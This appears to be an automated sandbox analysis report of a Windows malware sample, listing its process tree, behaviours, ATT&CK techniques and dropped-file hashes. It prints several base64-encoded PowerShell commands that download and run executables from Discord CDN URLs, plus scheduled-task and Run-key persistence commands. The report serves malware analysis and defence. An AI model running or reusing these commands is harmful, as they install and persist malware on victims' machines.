2040 wrote to memory of 2672 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 51 PID 2672 wrote to memory of 2060 2672 cmd.exe 47 PID 2672 wrote to memory of 2060 2672 cmd.exe 47 PID 2672 wrote to memory of 2060 2672 cmd.exe 47 PID 2060 wrote to memory of 2452 2060 HRtZImoued.exe 49 PID 2060 wrote to memory of 2452 2060 HRtZImoued.exe 49 PID 2060 wrote to memory of 2452 2060 HRtZImoued.exe 49 PID 2040 wrote to memory of 1524 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 56 PID 2040 wrote to memory of 1524 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 56 PID 2040 wrote to memory of 1524 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 56 PID 1524 wrote to memory of 1908 1524 cmd.exe 54 PID 1524 wrote to memory of 1908 1524 cmd.exe 54 PID 1524 wrote to memory of 1908 1524 cmd.exe 54 PID 1908 wrote to memory of 1936 1908 MGSumxcpSx.exe 53 PID 1908 wrote to memory of 1936 1908 MGSumxcpSx.exe 53 PID 1908 wrote to memory of 1936 1908 MGSumxcpSx.exe 53 PID 2040 wrote to memory of 1828 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 70 PID 2040 wrote to memory of 1828 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 70 PID 2040 wrote to memory of 1828 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 70 PID 1828 wrote to memory of 1284 1828 cmd.exe 68 PID 1828 wrote to memory of 1284 1828 cmd.exe 68 PID 1828 wrote to memory of 1284 1828 cmd.exe 68 PID 1828 wrote to memory of 1284 1828 cmd.exe 68 PID 1284 wrote to memory of 2800 1284 kPxex847I7.exe 67 PID 1284 wrote to memory of 2800 1284 kPxex847I7.exe 67
Processes
-
C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln2⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln"4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3056
-
-
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exeC:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADgANwA4ADYANwAwADQANAA0ADYANQA2ADEAOQAxADEANgAvADEAMQA4ADcAOAA2ADcANAAxADYAMwAxADUAOAAzADQANQA2ADgALwAyADIAZAAuAGUAeABlACcALAAgADwAIwBsAGYAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAYwBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAGoAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBoAGwAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAbgB1AGoAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2820
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2012
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2672
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1524
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe2⤵PID:2276
-
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exeC:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAcAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUANAA4ADMAMgAxADEANQA3ADcAMwAvAGQAbwBsAGwAbQBjAGMAcABpAGwALgBlAHgAZQAnACwAIAA8ACMAcgBhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGcAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARABVAEUAWgAuAGUAeABlACcAKQApADwAIwByAGcAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawBoAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBIAEQAVQBFAFoALgBlAHgAZQAnACkAPAAjAGoAcgBjACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAeQBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUAOQAwADYAOAAzADYANgA4ADUAOAAvAEgAeQB2AC4AZQB4AGUAJwAsACAAPAAjAGQAZQB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABnAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagB1AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAYQBjAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBqAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAdgB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBuAGIAdgAjAD4A"1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exeC:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1472
-
C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exeC:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAagBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADgAMAAwADgAMQA4ADMAOAAxADgAMQAvAGUAYgBjAHoAZAAuAGUAeABlACcALAAgADwAIwBzAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAaABsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAHYAbgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAYwBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAdQBhAG0AIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZABjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA1ADAAMAAzADQAOAA3ADAAMgA4ADEAMgAvAEcAMwA2AGQAaAAxAC4AZQB4AGUAJwAsACAAPAAjAHEAZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABtAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAZgBjAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB2AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAaQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADUASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBqAGUAZwAjAD4A"1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exeC:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1908
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f1⤵PID:2264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f2⤵
- Creates scheduled task(s)
PID:892
-
-
C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exeC:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe1⤵
- Executes dropped EXE
PID:596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd1⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1' -Value '"C:\Users\Admin\AppData\Roaming\f32\331.exe"' -PropertyType 'String'1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exeC:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1284
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5651ff944c882605eb6bb27cd8503b2f8
SHA1aaede77f678ea0ef16a67b632717f45a9d530668
SHA256df5922c887dfca43c39ecf43a2e1f5467fe813a3dcbab13c82c1d6dceb194723
SHA5128d264670e6f3500f61815a799eb70670d07a0937ba128d18f58665391963c77dbd97a8a67e0bec73490ff170f9ec7e1b3036d49757a53d78ccc9ff7c9bdbfc4a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5053fab938a29191701eaca560b269783
SHA128a2824d5548ab48e958afe84b5a179b90c06d67
SHA25641626d94673e5a9ee05267c2d5f88252ebb6165fcc3176b7a86b0b5e44db9058
SHA5124e3ac942152bba6eee560a36d4c595cde5a120b59e4190fb643adf11dcfc2d242a6b9973b6622b98d5cbed6443b2fd758028b107282aedff1568a8e20a955a54
-
Filesize
6KB
MD5d0c32ff1da809dda5724a90a5dd80ff5
SHA118f52952e62edb4ef0d31fa3b1aecb8678ccde1a
SHA2561a2e7d970dea301dc3480138506bf76dc01f82150ed8224a3f44136a777ce3a4
SHA512714cc6a0838f4dbb768632b4697c69f721badf0ee8169277c85a9cbdceff0fa668355767c7c8790ee605566f2deeeb87d4a7415bd34a3b8fd151cb4b6a54d3cb
-
Filesize
234B
MD57d447e1ef857ddf5640f2456f2d29e92
SHA160131aa77dea336e77892edbf2531c443fbb62e6
SHA2566a14a1c978a93731c379357248807f069795e1bebb0e0166bccc57a2c5c2559f
SHA512f02199eea81e1e9c7f3cd1f6c3df9690650b4a43720e1a560099cb15ed6bf8498a2871c8a9130afc30ac58ee6b8c777e2a94c02444b6574555cfdf1129fa8c4d
-
Filesize
5KB
MD53a12f3e0a5789b83867c96bc812a4437
SHA1fe2d7c9234de99ab8ab06dc40ff1228bf7a76737
SHA256c1232df3595cd2aed4c72c16a4c52c0687c1ab13df937c3251a49a254e3b6141
SHA5129c506529f8294f542a4f4e033631e7a2e4bd4f455fb16e95884f279fdf99721355405690936d610294d3210ac9f8924c2209a951c47881cc4448df12523dc741
-
Filesize
5KB
MD507a019680ddb018e31af5754664b022b
SHA184b3a70ce3952bb84b6fb1b95a6d48d548726344
SHA256d04655956d4e76da0fb9ba22e903a29bb16a836083e73faab8de9b1bc54d5c58
SHA512fd0cfef98f9883062e0dab7236574261797e8e9c47c87c388f52c20bf54192a0c62d08b8c11e22d367d93100c48dcb87abb1a4df7fc36b0ec7645f095287a3c4
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
5KB
MD590f04a884d482845cd83e43f781334c3
SHA18ac1dfce2b7262e532f2f4fe673580508a45fad2
SHA256a06db6cf89c5d53c71af847a88de21140163cdc45817ed1c0884c8ceabe8b8e7
SHA51271faed6315b58e892fbf8ce0118bf1da21fbadae02ba6346b7699dc904805b9858c0b331b2ba1ad6ac90c4ad8d5e859806a5fe2759f6308e99badfa728012433
-
Filesize
53KB
MD509d004710e617e57d92d16e7029b23ba
SHA1386dd985f2d8472f4c8d1e0d9c0eb85b62f4f3f0
SHA2565a484a2241fe121e65f290a39a5c1971ef6dcd2c8a854cad2bd5d3317c31f5af
SHA512bda9540b90ea784da828252572ce169b9916e0bd27720080a9488d2516f0f4df0dc0632adb57c30cb8f540668003eb8e5e4258c8c998ad169417be54e7d90994
-
Filesize
5KB
MD5805299701ce93e36f34b01f5805c09f5
SHA13573f93d3388363e418a4570e6f97270439aeac2
SHA256d9e4201c44aa17b9a3a1e876ce727cf220ab98b22dc71a8c5002025917fd75db
SHA512a5140f73f6da312e885587867275fb765bfc56440d1c1fe8c8f7c53797730ecb9c7ba6026f0f0902a9ec6f33d082deb507cafd7b9a0177ab3e5676cb7826031f
-
Filesize
5KB
MD591ce0e5d1a87995fc86f6a8cd119a564
SHA19e1c741edaa8517140934928dfd22a2b17e77b29
SHA25614e6fbd1b98b5b4177b5d79b363d538353a5a37a063986fa5364a7554d9a6644
SHA51278c767a6546fa5f5a02cc9dc35e775c4b49d173a6328f9845abf6da49e0a50e5ad77755f410653b5262b1a3618782fcb10620987fc50984f209f5e926a2f75d9
-
Filesize
3KB
MD574c98f00d4bad8f5d16d690619bfb899
SHA17a420c776bdcc1f823eb7a9d2d1bfce53fbe95d9
SHA256480f6b57d52aae1809268821ee61f8fba01470dd473b584016132dd027d60065
SHA5127cd66bc7f7106c27b4e77c8b0eb207eeb25e37fed3efb5709a4a6168aa790d4b7e547495b2fd8445eb88bb50ab9e99048cbf4609abd2c378084da6320e44f112
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51bcc173a136982b45fc5336d34c47e7d
SHA1fe9f480e7e961566badd78c7c4176f0da3e66b00
SHA256b152f50d4ed4ebcf56cfd8b514c7348de6537c40b26db45b6f08d8f520cfdc5d
SHA51271ee15a00e034682edb637f9e93b52d5529b8f72db72fe0acd0c3387a7d970abc75d09f02a4a88a29f171d688df0d9eba7c9475d1cd924216120f66c66afb1d8